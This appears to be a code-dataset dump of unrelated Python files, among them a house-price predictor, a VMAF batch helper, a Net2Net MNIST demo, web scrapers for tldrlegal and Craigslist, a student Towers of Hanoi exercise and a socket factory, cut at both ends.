mainSys().tm\n self.currentThread = self.UpdateLogFile(curr, monitor, t)\n","sub_path":"lib/alavan/gui/a_XTPMonitor.py","file_name":"a_XTPMonitor.py","file_ext":"py","file_size_in_byte":6411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"160930364","text":"import pickle\nimport json\nimport numpy as np\n\n__model = pickle.load(open(\"./homegram_home_prices_model.pickle\", 'rb'))\n__data_columns = json.load(open(\"./columns.json\"))['data_columns']\n\n# __data_columns = [\"number of rooms\", \"angwan rukuba, jos\", \"bauchi ring road, jos\", \"busa buji street, jos\",\n# \"farin gada road, jos\", \"jos terminus, ahmadu bello way, jos\", \"lamingo road, jos\",\n# \"old airport road, jos\", \"rayfield road, jos\", \"rock haven street, jos\"]\n__locations = __data_columns[1:]\n\n\ndef get_estimated_price(location, noOfRooms):\n try:\n loc_index = __data_columns.index(location.lower())\n except:\n loc_index = -1\n\n x = np.zeros(len(__data_columns))\n x[0] = noOfRooms\n if loc_index >= 0:\n x[loc_index] = 1\n\n return round(__model.predict([x])[0])\n\ndef get_location_names():\n return __locations\n\ndef load_saved_artifacts():\n print('Loading saved Artifacts...start')\n global __data_columns\n global __locations\n\n # __data_columns = json.load(open(\"./columns.json\"))['data_columns']\n __data_columns = [\"number of rooms\", \"angwan rukuba, jos\", \"bauchi ring road, jos\", \"busa buji street, jos\", \"farin gada road, jos\", \"jos terminus, ahmadu bello way, jos\", \"lamingo road, jos\", \"old airport road, jos\", \"rayfield road, jos\", \"rock haven street, jos\"]\n __locations = __data_columns[1:]\n global __model\n __model = pickle.load(open(\"./homegram_home_prices_model.pickle\", 'rb'))\n print(\"loading saved artifacts...done\")\n\nif __name__ == '__main__':\n print(get_location_names())\n print(get_estimated_price(\"bauchi ring road, jos\", 3))","sub_path":"code/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":1642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"384276598","text":"\n\nimport subprocess\nimport os\n\n\n#./run_vmaf yuv420p 3840 2048 \\\n# /media/moc/Data1/u/moc/TFM/QP_TESTS/collection/aux/output/IrishCow_3840x2048/QP_TEST/IrishCow_3840x2048.yuv \\\n# /media/moc/Data1/u/moc/TFM/QP_TESTS/collection/aux/output/IrishCow_3840x2048/QP_TEST/vmaf_test/yuv/IrishCow_3840x2048_QP_10_00:00:29.yuv \\\n\n#./ffmpeg2vmaf width height reference_path distorted_path [--out-fmt output_format --ci]\n\n'''\nNEW VQMT VERSION\nhttps://github.com/lvchigo/VQMT\n./vqmt /media/moc/Data/moc/AAVP/test_ts2png/reference_done/Lions_3840x1920_00_00_18_noaudio.yuv \n/media/moc/Alcachofa/moc/METRICS_EXPERIMENT/test/Lions_3840x1920_00_00_18_QP_48.yuv \n3840 1920 230 1 /media/moc/Data/moc/AAVP/pruebita SSIM MSSSIM\n\n'''\n\ndef doIt():\n ################################ SOURCE\n dir_orig = '/media/mcl/Maxtor/mcl/LIVE/video_original/'\n #file_orig ='IrishCow_3840x2048.yuv'\n width = '1280'\n height = '720'\n\n\n ############################### TEST\n dir_out = '/home/mcl/metricas_objetivas/'\n dir_test = '/media/mcl/Maxtor/mcl/LIVE/video/'\n\n\n\n\n\n for file in os.listdir(dir_orig):\n if file.endswith(\".yuv\"):\n content = os.path.splitext(file)[0]\n print(file)\n name = (content.strip().split('_'))[0] #+ '_' + (content.strip().split('_'))[1]\n print(name)\n #print('SOURCE NAME', name)\n\n for file2 in os.listdir(dir_test):\n if file2.endswith(\".yuv\"):\n content2 = os.path.splitext(file2)[0]\n #print(content2)\n filenames_txt = dir_out + content2 + '_run_vmqt.sh'\n name2 = (content2.strip().split('_'))[0] #+ '_' + (content2.strip().split('_'))[1]\n print(name2)\n #results_name = (content2.strip().split('_'))[0] + '_' + (content2.strip().split('_'))[1] + '_' + (content2.strip().split('_'))[2]\n #print('CODIFIED NAME', (content2.strip().split('_'))[0] + '_' + (content2.strip().split('_'))[1] + '_' + (content2.strip().split('_'))[2])\n if name == name2:\n print('trueeeeeeeeeeeee')\n os.system('echo yuv420p 1280 720 ' + dir_orig + file + ' ' + dir_test + file2 + ' >> videos_pa_vmafbatch_LIVE.txt')\n\n\n\n\ndoIt();","sub_path":"QualityMetrics/python/run_vmaf.py","file_name":"run_vmaf.py","file_ext":"py","file_size_in_byte":2301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"549076036","text":"from tkinter import *\n\nroot = Tk()\n\ntextLabel = Label(root,\n text='您所下載的影片含有未成人限制內容,請滿18周歲後再點擊觀看!',\n justify=LEFT,\n padx=10)\ntextLabel.pack(side=LEFT)\n\nphoto = PhotoImage(file='imgs/18-stop.png')\nimgLabel = Label(root, image=photo)\nimgLabel.pack(side=RIGHT)\n\nmainloop()\n","sub_path":"tkinter/tk3.py","file_name":"tk3.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"613031484","text":"'''\nReplace NEWLAYERS with different layer you would like to use to expand\nyour network.\n\nParameters:\n insert_pos - index of the newly inserted layer\n layers - a list of layers to be inserted\n\nExample to insert a FC layer:\n NEWLAYERS = {'insert_pos': 8,\n 'layers': [Dense(128)]}\nExample to insert a Conv layer:\n NEWLAYERS = {'insert_pos': 2,\n 'layers': [Activation('relu'),\n Convolution2D(NB_FILTERS, NB_CONV, NB_CONV),\n ZeroPadding2D((1, 1))]}\n\nPadding is required to keep the size of the convolutional layers the same\nbefore and after the expansion.\n'''\n\nfrom __future__ import print_function\nimport numpy as np\nnp.random.seed(1337) # for reproducibility\nimport os.path\nimport argparse\nfrom keras.datasets import mnist\nfrom keras.models import Sequential\nfrom keras.layers.core import Dense, Dropout, Activation, Flatten\nfrom keras.layers.convolutional import ZeroPadding2D\nfrom keras.layers.convolutional import Convolution2D, MaxPooling2D\nfrom keras.utils import np_utils\nfrom keras.models import model_from_json\nfrom net2net import Net2Net\n\n\nIMGROWS, IMGCOLS = 28, 28\nNB_CLASSES = 10\nNB_FILTERS = 32\nNB_POOL = 2\nNB_CONV = 3\n\nNEWLAYERS = {'insert_pos': 2,\n 'layers': [Activation('relu'),\n Convolution2D(NB_FILTERS, NB_CONV, NB_CONV),\n ZeroPadding2D((1, 1))]}\n\n\ndef prepare_mnist_data():\n '''Ger MNIST data'''\n\n (X_train, y_train), (X_test, y_test) = mnist.load_data()\n\n X_train = X_train.reshape(X_train.shape[0], 1, IMGROWS, IMGCOLS)\n X_test = X_test.reshape(X_test.shape[0], 1, IMGROWS, IMGCOLS)\n X_train = X_train.astype('float32')\n X_test = X_test.astype('float32')\n X_train /= 255\n X_test /= 255\n print('X_train shape:', X_train.shape)\n print(X_train.shape[0], 'train samples')\n print(X_test.shape[0], 'test samples')\n\n # convert class vectors to binary class matrices\n Y_train = np_utils.to_categorical(y_train, NB_CLASSES)\n Y_test = np_utils.to_categorical(y_test, NB_CLASSES)\n\n return X_train, X_test, Y_train, Y_test\n\n\ndef create_model(insert=None):\n '''Create the basic model'''\n\n model = Sequential()\n\n layers = [Convolution2D(NB_FILTERS, NB_CONV, NB_CONV,\n border_mode='valid',\n input_shape=(1, IMGROWS, IMGCOLS)),\n Activation('relu'),\n MaxPooling2D(pool_size=(NB_POOL, NB_POOL)),\n Dropout(0.25),\n Flatten(),\n Dense(128),\n Activation('relu'),\n Dropout(0.5),\n Dense(NB_CLASSES),\n Activation('softmax')]\n\n if insert is not None:\n for l in insert['layers']:\n layers.insert(insert['insert_pos'], l)\n\n for layer in layers:\n model.add(layer)\n\n return model\n\n\ndef is_dense(layer):\n '''Check if the layer is dense (fully connected)'''\n\n ltype = layer.get_config()['name'].split('_')[0]\n if ltype == 'dense':\n return True\n return False\n\n\ndef is_convolutional(layer):\n '''Check if the layer is convolutional'''\n\n ltype = layer.get_config()['name'].split('_')[0]\n if ltype.find('convolution') > -1:\n return True\n return False\n\n\ndef find_ref_layer_idx(layers):\n '''\n Find the index of the reference layer. It looks for Conv or FC\n layer from (insert_pos - 1) to 0 of the ori_layers list and return\n the index of the found layer\n '''\n\n insert_pos = NEWLAYERS['insert_pos']\n for i in range(1, insert_pos + 1):\n ref_layer = layers[insert_pos - i]\n if is_convolutional(ref_layer) or is_dense(ref_layer):\n return insert_pos - i\n\n\ndef find_major_layer_idx():\n '''Looking for the Conv or FC layer in NEWLAYERS['layers']'''\n\n for i in range(0, len(NEWLAYERS['layers'])):\n layer = NEWLAYERS['layers'][i]\n if is_convolutional(layer) or is_dense(layer):\n return i\n return -1\n\n\ndef get_deeper_weights(ref_layer):\n '''\n To calculate new weights to make the net deeper using Net2Net class,\n one needs to swap the axes for the right order.\n Dim of Keras conv layer: (OutChannel, InChannel, kH, kW)\n conv layer Net2Net class accepts: (kH, kW, InChannel, OutChannel)\n '''\n parms = ref_layer.get_weights()\n n2n = Net2Net()\n if is_convolutional(ref_layer):\n weights = parms[0].swapaxes(0, 2).swapaxes(1, 3).swapaxes(2, 3)\n new_w, new_b = n2n.deeper(weights, True)\n new_w = new_w.swapaxes(0, 2).swapaxes(1, 3)\n else:\n weights = parms[0]\n new_w, new_b = n2n.deeper(weights, True)\n return new_w, new_b\n\n\ndef main():\n parser = argparse.ArgumentParser(\n description=\"Demo Net2Net on MNIST dataset\"\n )\n\n parser.add_argument(\n \"-r\", \"--retrain\", default=False, action='store_true',\n help=\"To re-train and generate mnist_cnn.h5\"\n )\n parser.add_argument(\n \"--loss\", default=\"categorical_crossentropy\", type=str,\n help=\"Define loss function (default: categorical_crossentropy)\"\n )\n parser.add_argument(\n \"--optimizer\", default=\"adadelta\", type=str,\n help=\"Define optimizer (default: adadelta)\"\n )\n parser.add_argument(\n \"--weights\", default=\"./mnist_cnn.h5\", type=str,\n help=\"Path to the weight file (default: ./mnist_cnn.h5)\"\n )\n parser.add_argument(\n \"--batch-size\", type=int, default=128, dest='size',\n help=\"Define batch size (default: 128).\"\n )\n parser.add_argument(\n \"--epochs\", type=int, default=12,\n help=\"Define number of epochs (default: 12).\"\n )\n\n args = parser.parse_args()\n\n X_train, X_test, Y_train, Y_test = prepare_mnist_data()\n\n ori_model = create_model()\n ori_model.summary()\n if args.retrain or not os.path.exists(args.weights):\n print('Training the original model and save weights to %s'\n % args.weights)\n ori_model.compile(loss=args.loss,\n optimizer=args.optimizer,\n metrics=['accuracy'])\n\n ori_model.fit(\n X_train, Y_train, batch_size=args.size, nb_epoch=args.epochs,\n verbose=1, validation_data=(X_test, Y_test))\n ori_model.save_weights(args.weights, overwrite=True)\n\n ori_model.load_weights(args.weights)\n ori_layers = ori_model.layers\n\n model = create_model(insert=NEWLAYERS)\n model.summary()\n i = find_ref_layer_idx(ori_layers)\n\n # Layers such as ZeroPadding2D or Activation gets no weights\n shift = find_major_layer_idx()\n shift = 0 if shift < 0 else shift\n\n new_w, new_b = get_deeper_weights(ori_layers[i])\n\n n_new_layers = len(NEWLAYERS['layers'])\n for j in range(0, len(ori_layers)):\n if j <= i:\n parm = ori_layers[j].get_weights()\n model.layers[j].set_weights(parm)\n elif j == i + NEWLAYERS['insert_pos'] + shift:\n model.layers[j].set_weights([new_w, new_b])\n elif j > i + n_new_layers:\n parm = ori_layers[j - n_new_layers].get_weights()\n model.layers[j].set_weights(parm)\n\n model.compile(loss=args.loss,\n optimizer=args.optimizer,\n metrics=['accuracy'])\n\n model.fit(X_train, Y_train, batch_size=args.size, nb_epoch=args.epochs,\n verbose=1, validation_data=(X_test, Y_test))\n score = model.evaluate(X_test, Y_test, verbose=0)\n print('Test score:', score[0])\n print('Test accuracy:', score[1])\n\nif __name__ == '__main__':\n main()\n","sub_path":"mnist_net2net.py","file_name":"mnist_net2net.py","file_ext":"py","file_size_in_byte":7603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"} +{"seq_id":"635537939","text":"#!/usr/bin/env python3.6\n# -*- coding: utf-8 -*-\n\"\"\"\nUses webscraping to search tldrlegal for human-readable information on\nsoftware licenses, et cetera.\n\n===\n\nMIT License\n\nCopyright (c) 2018 Neko404NotFound\n\nPermission is hereby granted, free of charge, to any person obtaining\na copy of this software and associated documentation files (the\n\"Software\"), to deal in the Software without restriction, including\nwithout limitation the rights to use, copy, modify, merge, publish,\ndistribute, sublicense, and/or sell copies of the Software, and to\npermit persons to whom the Software is furnished to do so, subject to\nthe following conditions:\n\nThe above copyright notice and this permission notice shall be\nincluded in all copies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND,\nEXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF\nMERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND\nNONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE\nLIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION\nOF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION\nWITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\n\"\"\"\nfrom typing import List, Tuple\n\nimport bs4\nfrom dataclasses import dataclass\nimport discord\n\nfrom discomaton import option_picker\nfrom neko2.shared import alg, commands, string, traits\n\nbase_url = 'https://tldrlegal.com/'\n\n\n@dataclass()\nclass License:\n name: str\n brief: str\n can: List[Tuple[str, str]]\n cant: List[Tuple[str, str]]\n must: List[Tuple[str, str]]\n url: str\n\n\nclass TldrLegalCog(traits.CogTraits):\n @staticmethod\n def get_results_from_html(html: str) -> List[Tuple[str, str]]:\n \"\"\"\n Parses the given HTML as search results for TLDR legal, returning\n a list of tuples for each result: each tuple has the name and URL.\n \"\"\"\n soup = bs4.BeautifulSoup(html)\n\n results = soup.find_all(attrs={'class': 'search-result flatbox'})\n\n pages = []\n\n for result in results:\n link: bs4.Tag = result.find(name='a')\n url = f'{base_url}{link[\"href\"]}'\n name = link.text\n pages.append((name, url))\n\n return pages\n\n @staticmethod\n def get_license_info(url: str, html: str) -> License:\n \"\"\"\n Parses a license info page to get the info regarding said license as an\n object.\n \"\"\"\n soup = bs4.BeautifulSoup(html)\n\n name = soup.find(name='h1', attrs={'class': 'page-title'}).text\n summary = soup.find(name='div', attrs={'class': 'summary-content'})\n summary = summary.text.strip()\n\n # Get the results license-root div.\n results = soup.find(name='div', attrs={'id': 'license_root'})\n\n can_tag = results.find(name='ul', attrs={'class': 'bucket-list green'})\n cant_tag = results.find(name='ul', attrs={'class': 'bucket-list red'})\n must_tag = results.find(name='ul', attrs={'class': 'bucket-list blue'})\n\n def remove_title_li(tag: bs4.Tag):\n # Pop the title\n tag.find(name='li', attrs={'class': 'list-header'}).extract()\n\n remove_title_li(can_tag)\n remove_title_li(cant_tag)\n remove_title_li(must_tag)\n\n def get_head_body_pairs(tag: bs4.Tag):\n return (\n tag.find(attrs={'class': 'attr-head'}).text,\n tag.find(attrs={'class': 'attr-body'}).text)\n\n can = [get_head_body_pairs(li) for li in can_tag.find_all(name='li')]\n cant = [get_head_body_pairs(li) for li in cant_tag.find_all(name='li')]\n must = [get_head_body_pairs(li) for li in must_tag.find_all(name='li')]\n\n return License(name, summary, can, cant, must, url)\n\n @commands.probably_broken\n @commands.group(brief='Search for license info on tldrlegal.',\n aliases=['license', 'licence'],\n invoke_without_command=True)\n async def tldrlegal(self, ctx, *, search):\n await self.tldrlegal_logic(ctx, search, False)\n\n @commands.probably_broken\n @tldrlegal.command(brief='Search for a license on tldrlegal, and give '\n 'more information in the results.')\n async def more(self, ctx, *, search):\n await self.tldrlegal_logic(ctx, search, True)\n\n async def tldrlegal_logic(self, ctx, query, verbose):\n \"\"\"\n Helper to prevent code duplication.\n \"\"\"\n http = await self.acquire_http()\n\n # Get search results\n async with http.get(f'{base_url}search', params={'q': query}) as resp:\n if resp.status != 200:\n return await ctx.send(f'tldrlegal said {resp.reason!r}')\n\n results = self.get_results_from_html(await resp.text())\n\n count = len(results)\n\n if count == 0:\n return await ctx.send('Nothing was found.', delete_after=15)\n elif count == 1:\n # Get the URL\n page = results[0]\n else:\n page = await option_picker(\n ctx,\n *results,\n option_formatter=lambda o: o[0].replace('*', '∗')\n )\n\n if page is None:\n return await ctx.send('Took too long...')\n\n # Get the info into an object.\n async with http.get(page[1]) as resp:\n if resp.status != 200:\n return await ctx.send(f'tldrlegal said {resp.reason!r}')\n license_info = self.get_license_info(page[1], await resp.text())\n\n # Generate embed and send.\n embed = discord.Embed(title=license_info.name,\n description=string.trunc(license_info.brief),\n colour=alg.rand_colour(),\n url=license_info.url)\n embed.set_footer(text='Disclaimer: This is only a short summary of the'\n ' Full Text. No information on TLDRLegal is'\n ' legal advice.')\n\n def fmt(prs):\n if verbose:\n s = string.trunc('\\n'.join(f'**{n}** {d}' for n, d in prs),\n 1024)\n else:\n s = string.trunc('\\n'.join(f'- {n}' for n, _ in prs),\n 1024)\n\n # Prevents errors for empty bodies.\n return s or '—'\n\n embed.add_field(name='__CAN__', value=fmt(license_info.can),\n inline=not verbose)\n embed.add_field(name='__CANNOT__', value=fmt(license_info.cant),\n inline=not verbose)\n embed.add_field(name='__MUST__', value=fmt(license_info.must),\n inline=not verbose)\n\n if not verbose:\n embed.add_field(name='\\u200b',\n value='_Run again using `tldrlegal more ` '\n 'to get a longer explanation!_')\n\n await ctx.send(embed=embed)\n\n\ndef setup(bot):\n bot.add_cog(TldrLegalCog())\n","sub_path":"neko2/cogs/tldrlegal.py","file_name":"tldrlegal.py","file_ext":"py","file_size_in_byte":7058,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"} +{"seq_id":"363039453","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nImage Exposure Value Computation\n================================\n\nDefines image exposure value computation objects:\n\n- :func:`exposure_value`\n- :func:`adjust_exposure`\n- :func:`average_luminance`\n\"\"\"\n\nfrom __future__ import division, unicode_literals\n\nimport numpy as np\n\n__author__ = 'Colour Developers'\n__copyright__ = 'Copyright (C) 2015-2017 - Colour Developers'\n__license__ = 'New BSD License - http://opensource.org/licenses/BSD-3-Clause'\n__maintainer__ = 'Colour Developers'\n__email__ = 'colour-science@googlegroups.com'\n__status__ = 'Production'\n\n__all__ = ['exposure_value',\n 'adjust_exposure',\n 'average_luminance']\n\n\ndef exposure_value(f_number, exposure_time, iso):\n \"\"\"\n Computes the exposure value from given image *FNumber*, *Exposure Time* and\n *ISO* values.\n\n Parameters\n ----------\n f_number : array_like\n Image *FNumber*.\n exposure_time : array_like\n Image *Exposure Time*.\n iso : array_like\n Image *ISO*.\n\n Returns\n -------\n ndarray\n Image exposure value.\n\n Examples\n --------\n >>> exposure_value(8, 1, 100)\n 6.0\n \"\"\"\n\n N = np.asarray(f_number)\n t = np.asarray(exposure_time)\n S = np.asarray(iso)\n\n EV = np.log2(N ** 2) + np.log2(1 / t) - np.log2(100 / S)\n\n return EV\n\n\ndef adjust_exposure(a, EV):\n \"\"\"\n Adjusts given array exposure using given :math:`EV` exposure value.\n\n Parameters\n ----------\n a : array_like\n Array to adjust the exposure.\n EV : numeric\n Exposure adjustment value.\n\n Returns\n -------\n ndarray\n Exposure adjusted array.\n\n Examples\n --------\n >>> adjust_exposure(np.array([0.25, 0.5, 0.75, 1]), 1)\n array([ 0.5, 1. , 1.5, 2. ])\n \"\"\"\n\n a = np.asarray(a)\n\n return a * pow(2, EV)\n\n\ndef average_luminance(f_number, exposure_time, iso, k=12.5):\n \"\"\"\n Computes the average luminance from given image *FNumber*, *Exposure Time*\n and *ISO* values.\n\n Parameters\n ----------\n f_number : array_like\n Image *FNumber*.\n exposure_time : array_like\n Image *Exposure Time*.\n iso : array_like\n Image *ISO*.\n k : numeric, optional\n Reflected light calibration constant :math:`K`.\n\n Returns\n -------\n ndarray\n Image average luminance.\n\n References\n ----------\n .. [1] Wikipedia. (n.d.). EV as a measure of luminance and illuminance.\n Retrieved November 14, 2015,\n from https://en.wikipedia.org/wiki/\\\nExposure_value#EV_as_a_measure_of_luminance_and_illuminance\n\n Examples\n --------\n >>> average_luminance(8, 1, 100)\n 0.125\n \"\"\"\n\n N = np.asarray(f_number)\n t = np.asarray(exposure_time)\n S = np.asarray(iso)\n\n L = (S * t) / (k * N ** 2)\n\n return L\n","sub_path":"colour_hdri/utilities/exposure.py","file_name":"exposure.py","file_ext":"py","file_size_in_byte":2841,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"} +{"seq_id":"245192782","text":"from django.shortcuts import render\nfrom django.views.generic import TemplateView, ListView\nimport requests\nfrom bs4 import BeautifulSoup\nimport re\n\nclass IndexView(ListView):\n template_name = \"index.html\"\n\n def get_queryset(self):\n pass\n\n def get_context_data(self):\n context = super().get_context_data()\n if self.request.GET:\n base = \"https://{}.craigslist.org{}\"\n craigslist = \"https://{}.craigslist.org/search/cto?query=-volkswagen+-vw+-impala+-mercedes+-bmw+-audi+-cts+-iq+-fiesta+-versa+-spark+-maxima+-leaf+-saturn+-tl+-infiniti+-mercury+-frs+-jaguar+-chrysler+-lincoln+-fiat&&auto_title_status=1&auto_title_status=5&bundleDuplicates=1&auto_make_model={}&min_auto_year={}&max_auto_miles={}&min_price=6000&max_price={}\"\n data = requests.get(craigslist.format(self.request.GET.get('city'), self.request.GET.get('car'), self.request.GET.get('year'), self.request.GET.get('miles'), self.request.GET.get('price')))\n souper = BeautifulSoup(data.text, \"html.parser\")\n # Get all result list items\n p_results = souper.findAll(\"p\", {\"class\":\"result-info\"})\n p_list = [p for p in p_results]\n abstract_list = [tag.contents[5].string for tag in p_list]\n price_list = [tag.contents[7].span.string for tag in p_list]\n href_list = [tag.contents[5].get(\"href\") for tag in p_list]\n city_list = [tag.contents[7].find(\"span\", {\"class\":\"result-hood\"}) for tag in p_list]\n\n # Iterate over href's & get more info off indidviual pages\n city = self.request.GET.get('city')\n meta_list = []\n for href in href_list:\n detail = requests.get(base.format(city, href))\n detail_soup = BeautifulSoup(detail.text, \"html.parser\")\n meta_results = detail_soup.find_all(\"b\")\n b_list = [b.contents for b in meta_results]\n\n meta_results2 = detail_soup.find_all(\"p\", {\"class\":\"attrgroup\"})\n results_list = [p for p in meta_results2]\n\n meta_list.append(meta_results)\n # meta_list2 = [tag for tag in meta_list]\n\n\n # All info combined in list of tuples\n big_list = [(tag.contents[7].span.string, tag.contents[5].string, tag.contents[5].get(\"href\")) for tag in p_list]\n # Context returned to Template\n context['meta_list'] = meta_list\n context['city'] = self.request.GET.get('city')\n context['price_list'] = price_list\n context['abstract_list'] = abstract_list\n context['big_list'] = big_list\n # print(big_list)\n # print(b_list)\n return context\n","sub_path":"scraping_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"} +{"seq_id":"312418574","text":"\n\n#Werte von 1-n in die Anfangsliste einfügen\nneun = n\nA=[]\nif neun>0:\t\t\n\tA.append(neun)\n\tneun = neun-1\n\tprint (A)\n\ndef hanoi( n, A, H, Z):\n\t\n#python keeps track of the disks on the three stacks it opens for the function\n\n\tif n>0:\n\t\thanoi((n-1), A, Z, H)\t\n\t\tdef verschiebe(A, Z):\n\t\t\tif Z==[] or A[-1] < Z[-1]:\n\t\t\t\tlast= A.pop()\n\t\t\t\tprint (A)\n\t\t\t\tZ.append(last)\n\t\t\t\tprint(\"nach dem Zug sieht die Ursprungsliste so aus: \", A, \"und die Zielliste so aus: \", Z)\t\n\t\t\telse:\n\t\t\t\tprint(\"falsche EIngabe\")\n\t\tverschiebe(A, Z)\n\t\thanoi((n-1), H, A, Z)\n\telse:\n\t\treturn A, Z, H\n\t\t\n\n\t\t\n\n\t\n\"\"\"\n\t\ndef hanoi(n, source, helper, target):\n if n > 0:\n # move tower of size n - 1 to helper:\n hanoi(n - 1, source, target, helper)\n # move disk from source peg to target peg\n if source:\n target.append(source.pop())\n print(\"Die Scheibe wird von \" , source, \"nach\", target, \"verschoben\")\n # move tower of size n-1 from helper to target\n hanoi(n - 1, helper, source, target)\n \nsource = [3,2,1]\ntarget = []\nhelper = []\nhanoi(len(source),source,helper,target)\n\nprint (source, helper, target)\n\"\"\"\n","sub_path":"U04/hanoi.py","file_name":"hanoi.py","file_ext":"py","file_size_in_byte":1140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"} +{"seq_id":"448374375","text":"# -*- coding: utf-8 -*-\n##----------------------------------------------------------------------\n## nbsocket factory\n##----------------------------------------------------------------------\n## Copyright (C) 2007-2015 The NOC Project\n## See LICENSE for details\n##----------------------------------------------------------------------\n\n## Python modules\nfrom __future__ import with_statement\nimport logging\nimport time\nfrom threading import RLock\n## NOC modules\nfrom noc.lib.debug import error_report\nfrom exceptions import get_socket_error\nfrom listentcpsocket import ListenTCPSocket\nfrom connectedtcpsocket import ConnectedTCPSocket\nfrom acceptedtcpsocket import AcceptedTCPSocket\nfrom pollers.detect import get_poller\nfrom pipesocket import PipeSocket\nfrom noc.lib.perf import MetricsHub\n\nlogger = logging.getLogger(__name__)\n\n\nclass SocketFactory(object):\n \"\"\"\n Socket factory is a major event loop controller, maintaining full socket\n lifetime\n \"\"\"\n def __init__(self, tick_callback=None,\n polling_method=None, controller=None,\n write_delay=True, metrics_prefix=None):\n if not metrics_prefix:\n metrics_prefix = \"noc.\"\n metrics_prefix += \"socketfactory\"\n self.metrics = MetricsHub(\n metrics_prefix,\n \"sockets.count\",\n \"sockets.register\",\n \"sockets.unregister\",\n \"loops\",\n \"ticks\",\n \"handle.reads\",\n \"handle.closed_reads\",\n \"handle.writes\"\n )\n self.sockets = {} # fileno -> socket\n self.socket_name = {} # socket -> name\n self.name_socket = {} # name -> socket\n self.new_sockets = [] # list of (socket,name)\n self.tick_callback = tick_callback\n self.to_shutdown = False\n self.register_lock = RLock() # Guard for register/unregister operations\n self.controller = controller # Reference to controlling daemon\n if polling_method is None:\n # Read settings if available\n try:\n from noc.settings import config\n polling_method = config.get(\"main\", \"polling_method\")\n except ImportError:\n polling_method = \"select\"\n self.poller = get_poller(polling_method)\n # Performance data\n self.cnt_polls = 0 # Number of polls\n self.write_delay = write_delay\n if not self.write_delay:\n self.control = PipeSocket(self)\n\n def shutdown(self):\n \"\"\"\n Shut down socket factory and exit next event loop\n \"\"\"\n logger.info(\"Shutting down the factory\")\n self.to_shutdown = True\n\n def register_socket(self, socket, name=None):\n \"\"\"\n Register socket to a factory. Socket became a new socket\n \"\"\"\n logger.debug(\"Register socket %s (%s)\", socket.get_label(), name)\n with self.register_lock:\n self.new_sockets += [(socket, name)]\n self.metrics.sockets_register += 1\n\n def unregister_socket(self, socket):\n \"\"\"\n Remove socket from factory\n \"\"\"\n with self.register_lock:\n logger.debug(\"Unregister socket %s\", socket.get_label())\n self.set_status(socket, r=False, w=False)\n if socket not in self.socket_name: # Not in factory yet\n return\n self.sockets.pop(socket.fileno(), None)\n old_name = self.socket_name.pop(socket, None)\n self.name_socket.pop(old_name, None)\n if socket in self.new_sockets:\n self.new_sockets.remove(socket)\n self.metrics.sockets_unregister -= 1\n\n def guarded_socket_call(self, socket, method):\n \"\"\"\n Wrapper for safe call of socket method. Handles and reports\n socket errors.\n\n :return: Call status\n :rtype: Bool\n \"\"\"\n try:\n method()\n except Exception:\n exc = get_socket_error()\n try:\n if exc:\n socket.on_error(exc)\n else:\n socket.error(\"Unhandled exception when calling %s\" % str(method))\n error_report()\n socket.close()\n except Exception:\n socket.error(\"Error when handling error condition\")\n error_report()\n return False\n return True\n\n def init_socket(self, socket, name):\n \"\"\"\n Initialize new socket. Call socket's create_socket() when necessary\n and attach socket to fabric's event loop\n \"\"\"\n if not socket.socket_is_ready():\n socket.debug(\"Initializing socket\")\n if not self.guarded_socket_call(socket, socket.create_socket):\n return\n if not socket.socket_is_ready():\n # Race condition raised. Socket is unregistered since last socket.create_socket call.\n # Silently ignore and exit\n return\n with self.register_lock:\n self.sockets[socket.fileno()] = socket\n if socket in self.socket_name:\n # Socket was registred\n old_name = self.socket_name[socket]\n del self.socket_name[socket]\n if old_name:\n del self.name_socket[old_name]\n self.socket_name[socket] = name\n if name:\n self.name_socket[name] = socket\n\n def listen_tcp(self, address, port, socket_class, backlog=100,\n nconnects=None, **kwargs):\n \"\"\"Create listening TCP socket\"\"\"\n if not issubclass(socket_class, AcceptedTCPSocket):\n raise ValueError(\"socket_class should be a AcceptedTCPSocket subclass\")\n l = ListenTCPSocket(self, address, port, socket_class, backlog,\n nconnects, **kwargs)\n l.set_name(\"listen-tcp-%s:%d\" % (address, port))\n return l\n\n def connect_tcp(self, address, port, socket_class):\n \"\"\"Create ConnectedTCPSocket\"\"\"\n if not issubclass(socket_class, ConnectedTCPSocket):\n raise ValueError(\"socket_class should be a ConnectedTCPSocket subclass\")\n return socket_class(self, address, port)\n\n def get_socket_by_name(self, name):\n \"\"\"Get socket by registered name\"\"\"\n with self.register_lock:\n return self.name_socket[name]\n\n def get_name_by_socket(self, socket):\n \"\"\"Get socket name by instance\"\"\"\n with self.register_lock:\n return self.socket_name[socket]\n\n def __len__(self):\n \"\"\"Returns a number of factory's sockets\"\"\"\n with self.register_lock:\n return len(self.sockets)\n\n def close_stale(self):\n \"\"\"Detect and close stale sockets\"\"\"\n with self.register_lock:\n for s in [s for s in self.sockets.itervalues() if s.is_stale()]:\n logger.debug(\"Closing stale socket %s\", s.get_label())\n s.stale = True\n s.close()\n\n def create_pending_sockets(self):\n \"\"\"Initialize pending sockets\"\"\"\n with self.register_lock:\n while self.new_sockets:\n socket, name 